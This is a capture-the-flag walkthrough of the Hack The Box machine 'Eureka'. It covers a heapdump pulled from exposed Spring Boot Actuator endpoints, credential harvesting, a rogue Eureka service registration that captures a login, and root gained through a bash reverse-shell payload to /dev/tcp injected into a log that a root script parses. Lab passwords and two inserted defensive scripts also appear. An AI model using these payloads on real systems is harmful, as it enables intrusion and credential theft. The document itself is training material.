⚜️Eureka

https://app.hackthebox.com/machines/Eureka

Recon

Using the Scripts/Functions/Tools

nmap -sCV -T4 <ip> -oA <file>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Adding new hosts

/etc/hosts entry
10.129.242.192 eureka.htb furni.htb

Furni-Website

➜  eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50                                                                                                                                                                             
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html                                                           
  from pkg_resources import DistributionNotFound, VersionConflict                                                                                                                                                                          
                                                                                                                                                                                                                                           
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                    
                                                                                                                                                                                                                                           
Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordlist size: 10403                                                                                                                                                         
                                                                                                                                                                                                                                           
Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_furni.htb/__25-04-27_22-17-19.txt                                                                                                                                      
                                                                                                                     
Target: http://furni.htb/                                                                                            
                                                                                                                     
[22:17:19] Starting:                       
[...]
[22:17:27] 200 -    2KB - /actuator                        
[22:17:27] 400 -  105B  - /actuator/;/sso                  
[22:17:27] 400 -  115B  - /actuator/;/springWebflow
[22:17:27] 400 -  112B  - /actuator/;/statistics
[22:17:27] 400 -  113B  - /actuator/;/ssoSessions
[22:17:27] 400 -  108B  - /actuator/;/status
[22:17:27] 400 -  112B  - /actuator/;/threaddump
[22:17:27] 400 -  107B  - /actuator/;/trace
[22:17:27] 200 -   20B  - /actuator/caches                 
[22:17:27] 200 -    6KB - /actuator/env                    
[22:17:27] 200 -    2B  - /actuator/info                   
[22:17:27] 200 -  467B  - /actuator/features
[22:17:27] 200 -   76MB - /actuator/heapdump
[22:17:27] 200 -    3KB - /actuator/metrics                
[22:17:27] 200 -   54B  - /actuator/scheduledtasks
[22:17:28] 200 -  198KB - /actuator/beans                  
[22:17:28] 400 -  108B  - /actuator/sessions               
[22:17:28] 405 -  114B  - /actuator/refresh                
[22:17:28] 200 -   96KB - /actuator/loggers                
[22:17:29] 200 -   15B  - /actuator/health                 
[22:17:29] 200 -   35KB - /actuator/mappings               
[22:17:29] 200 -  180KB - /actuator/conditions             
[22:17:29] 400 -  106B  - /admin/%3bindex/
[22:17:30] 200 -  824KB - /actuator/threaddump             
[22:17:30] 400 -   98B  - /admin;/                         
[22:17:31] 400 -   98B  - /Admin;/                         
[22:17:31] 200 -   36KB - /actuator/configprops     
[...]

Information leaks because of misconfigured Spring Boot Actuators: http://furni.htb/actuator/env

Checking a common entry points list

/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdown

We find a heapdump at http://furni.htb/actuator/heapdump
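
From the defending side, the exposure above can be spotted in the web server's own logs. The following added example (not part of the original write-up) scans nginx combined-format access-log lines for successful requests to sensitive Actuator endpoints; the function names, the endpoint selection and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag successful requests to
# sensitive Spring Boot Actuator endpoints in an nginx "combined" access log.
# The endpoint list and the sample log lines are constructed for illustration.

# Endpoints that expose configuration, process memory or runtime internals.
SENSITIVE='env|heapdump|threaddump|configprops|beans|mappings|loggers'

# stdin: access-log lines. stdout: "ip status bytes path" for every hit.
find_actuator_hits() {
    awk -v pat="^/actuator/(${SENSITIVE})([/?]|\$)" '
        {
            ip = $1; path = $7; status = $9; bytes = $10
            # Only 2xx responses mean data actually left the server.
            if (path ~ pat && status ~ /^2/)
                print ip, status, bytes, path
        }'
}

# stdin: output of find_actuator_hits. stdout: "ip distinct_endpoints",
# a quick signal for clients that enumerate several endpoints.
hits_per_client() {
    awk '!seen[$1 " " $4]++ { n[$1]++ } END { for (ip in n) print ip, n[ip] }' | sort
}

# Constructed sample input (documentation address ranges, not real traffic).
sample_access_log() {
    cat <<'EOF'
203.0.113.7 - - [27/Apr/2025:22:17:27 +0000] "GET /actuator/env HTTP/1.1" 200 6144 "-" "scanner"
203.0.113.7 - - [27/Apr/2025:22:17:27 +0000] "GET /actuator/heapdump HTTP/1.1" 200 79691776 "-" "scanner"
203.0.113.7 - - [27/Apr/2025:22:17:28 +0000] "GET /actuator/refresh HTTP/1.1" 405 114 "-" "scanner"
203.0.113.7 - - [27/Apr/2025:22:17:29 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "scanner"
198.51.100.9 - - [27/Apr/2025:22:18:02 +0000] "GET /shop?ref=/actuator/env HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Apr/2025:22:18:05 +0000] "GET /actuator/sessions HTTP/1.1" 400 108 "-" "Mozilla/5.0"
EOF
}

sample_access_log | find_actuator_hits
sample_access_log | find_actuator_hits | hits_per_client
```

A 200 response on /actuator/heapdump with a body of tens of megabytes is the line to alert on first, since it means a copy of process memory left the host.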

Using a script written with the help of ChatGPT, we find a password:

head-search.sh
#!/bin/bash

# Usage check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <heapdump-file>"
    exit 1
fi

HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"

# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "[*] Extracting and searching in $HEAPDUMP..."
echo "" > "$OUTPUT"

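# Search for sensitive patterns.
# NOTE: the captured line was cut off by the editor after "sess"; only the
# "session" alternative and the redirect to $OUTPUT are completed here.
# Any further alternatives in the original pattern are not recoverable.
strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+|pwd[ =:][^[:space:]]+|secret[ =:][^[:space:]]+|token[ =:][^[:space:]]+|key[ =:][^[:space:]]+|credential[ =:][^[:space:]]+|auth[ =:][^[:space:]]+|session[ =:][^[:space:]]+' > "$OUTPUT"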

echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential sensitive items."
echo

# Pretty print
while IFS= read -r line; do
    if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
        echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|auth\|session'; then
        echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then
        echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then
        echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
        echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
    else
        echo -e "${YELLOW}[OTHER]${NC} $line"
    fi
done < "$OUTPUT"

echo
echo "[*] Full results also saved in: $OUTPUT"
[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,    
[..]

User

➜  eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 27 Apr 2025 09:00:04 PM UTC

  System load:           0.0
  Usage of /:            63.8% of 6.79GB
  Memory usage:          47%
  Swap usage:            0%
  Processes:             244
  Users logged in:       0
  IPv4 address for eth0: 10.129.182.126
  IPv6 address for eth0: dead:beef::250:56ff:fe94:4834


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71
oscar190@eureka:~$ 

We find another password in the application.yaml of the Eureka server:

oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password|secret|api[_-]?key|token' ./target/classes/application.yaml 
    name: "Eureka Server"

  security:
    user:
      name: EurekaSrvr
      password: 0scarPWDisTheB3st

server:
  port: 8761
  address: 0.0.0.0

nmap-full-scan

The full scan shows the other HTTP server, Eureka, on port 8761, as also seen in the output of the command above.

Eureka-Server

Using these credentials we can log in.

Create a new fake service, using "Hacking Netflix Eureka" as an example.

Replace YOURIP with your own IP address:
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",  
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

After some time, we receive the username and password on our listener:

➜  eureka rlwrap nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=BDpsWbgK9mVLFJVx5FuxOvZT2DfbiKCuM7CjmcVRPi8gMtPBNwpbOoBrwwRmJfBBhnaFA8My9VbqvJKDAoKUoadmD04YULD3ls

After decoding the URL-encoded values with CyberChef, we get the user flag:

➜  eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 10 Apr 2025 07:41:57 AM UTC

  System load:           0.04
  Usage of /:            84.1% of 8.02GB
  Memory usage:          44%
  Swap usage:            0%
  Processes:             248
  Users logged in:       1
  IPv4 address for eth0: 10.129.232.19
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f97


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71
miranda-wise@eureka:~$ 

Root

Checking for processes running with root privileges shows a log_analyse.sh:

ps -eo user,pid,comm | grep '^root'
[..]
root     4105259 log_analyse.sh
root     4105350 log_analyse.sh

Searching for log_analyse.sh

miranda-wise@eureka:/$ find . -name log_analyse.sh                                                                                                                                                                                         
find: ‘./boot/lost+found’: Permission denied                                                                                                                                                                                               
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh 

In that file at analyze_http_statuses() we can

code=$(echo "$line" | grep -oP 'Status: \K.*')
miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log
➜  eureka rlwrap nc -nlvp 1337
listening on [any] 1337 ...

connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958
bash: cannot set terminal process group (1726439): Inappropriate ioctl for device
bash: no job control in this shell
root@eureka:~# 

➜  eureka ssh miranda.wise@furni.htb
miranda.wise@furni.htb's password: 
Permission denied, please try again.
miranda.wise@furni.htb's password: 

➜  eureka 
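
The extraction line above keeps everything after "Status: ", so whoever can write the log file controls $code. A hardened variant, as an added example that is not the box's script: it accepts only a three-digit code and counts every other value as rejected. The function names and sample log lines are constructed, and it assumes the original script later uses $code in a bash numeric comparison, which the page does not show.

```shell
#!/bin/sh
# Added example (not the script from the box): tally HTTP status codes from a
# log while treating the extracted value strictly as data.
# ASSUMPTION: the original script later puts $code into a bash numeric test
# ([[ "$code" -eq ... ]] or (( ... ))); bash evaluates such operands as
# arithmetic, so a value like x[$(cmd)] gets cmd executed.

# Print the code if exactly three digits follow "Status: "; else return 1.
extract_status() {
    code=$(printf '%s\n' "$1" | sed -n 's/.*Status: //p')
    case "$code" in
        [1-5][0-9][0-9]) printf '%s\n' "$code" ;;
        *) return 1 ;;
    esac
}

# stdin: log lines. stdout: "<code> <count>" per code, then the number of
# "Status:" lines that failed validation (worth alerting on).
summarize_statuses() {
    valid=""
    rejected=0
    while IFS= read -r line; do
        case "$line" in *"Status: "*) ;; *) continue ;; esac
        if code=$(extract_status "$line"); then
            valid="${valid}${code}
"
        else
            rejected=$((rejected + 1))
        fi
    done
    printf '%s' "$valid" | sort | uniq -c | awk '{ print $2, $1 }'
    printf 'rejected %s\n' "$rejected"
}

# Constructed sample log; the last Status line mimics a tampered entry.
sample_app_log() {
    cat <<'EOF'
2025-04-09T11:35:01 INFO  HTTP Status: 200
2025-04-09T11:35:02 INFO  HTTP Status: 200
2025-04-09T11:35:03 WARN  HTTP Status: 404
2025-04-09T11:35:04 INFO  User logged in
2025-04-09T11:35:05 INFO  HTTP Status: x[$(id)]
EOF
}

sample_app_log | summarize_statuses
```

Validation closes the injection path; the other half of the fix is that a log parsed by a root process should not be writable or replaceable by an unprivileged account.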
